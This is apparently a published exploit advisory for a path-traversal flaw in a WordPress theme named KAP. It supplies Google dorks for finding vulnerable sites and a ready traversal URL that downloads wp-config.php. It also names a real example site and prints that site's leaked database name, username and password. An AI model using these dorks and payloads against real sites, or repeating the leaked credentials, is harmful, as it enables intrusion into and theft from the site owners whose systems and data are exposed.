WordPress 4.9.8 KingAbdullahPort KAP DB Config File Download

############################################################################################

# Exploit Title : WordPress 4.9.8 KingAbdullahPort KAP Themes Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepages : kingabdullahport.com.sa - phoekus.com
# Software Information Link :
phoekus.com/webdesignandevelopmentwordpress
linkedin.com/company/phoekus
zoominfo.com/c/phoekus/371582770
# Software Affected Version : 4.9.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : inurl:/wp-content/themes/kap/
intext:Site by Phoekus
# Vulnerability Type :
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
*  WordPress 4.9.8 KingAbdullahPort KAP Themes is prone to a vulnerability that lets attackers download database config file because

the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files

within the context of the web server process and obtain potentially sensitive informations.

* An information exposure is the intentional or unintentional disclosure  of information to an actor that is not explicitly authorized

to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct

a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve

to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
****************
/download.php

# Vulnerable Parameter :
**********************
?url=

# Database Configuration File Download Exploit :
********************************************
/wp-content/themes/kap/download.php?url=../../../wp-config.php

Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

############################################################################################

# Example Vulnerable Sites :
*************************
[+] kingabdullahport.com.sa/wp-content/themes/kap/download.php?url=../../../wp-config.php

** //
/** The name of the database for WordPress
*/
define('DB_NAME', 'kingapor_kap');

/
** MySQL database username
*/
define('DB_USER', 'kingapor_kapusr');

/
** MySQL database password
*/
define('DB_PASSWORD', '@teGo0Z*zZBk');

/
** MySQL hostname *
/
define('DB_HOST', 'localhost');

/
** Database Charset to use in creating database tables.
*/
define('DB_CHARSET', 'utf8');

/
** The Database Collate type. Don't change this if in doubt.
*/
define('DB_COLLATE', '');

/**#@+
 *

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################